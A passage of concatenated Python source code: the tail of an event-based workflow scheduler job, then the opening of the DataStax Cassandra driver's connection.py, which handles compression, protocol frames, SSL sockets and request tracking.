self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _stop_scheduling_periodic_tasks(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
if not dagruns:
self.log.warning(f'Gets no dagruns to remove periodic events with dag_id: {dag_id} '
f'and execution_date: {execution_date}.')
else:
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun) \
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session) \
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
self._stop_scheduling_periodic_tasks(dag_id=dag_run.dag_id, execution_date=dag_run.execution_date)
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, host=None):
Exception.__init__(self, message)
self.host = host
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, host, startup_version):
msg = "Unsupported protocol version on %s: %d" % (host, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, host)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
ssl_options = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False):
self.host = host
self.port = port
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
self.lock = RLock()
self.connected_event = Event()
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, host, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(host, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(host, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
def _connect_socket(self):
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.host)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.host, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.host, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.host, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.host)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.host)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None):
return self.wait_for_responses(msg, timeout=timeout)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
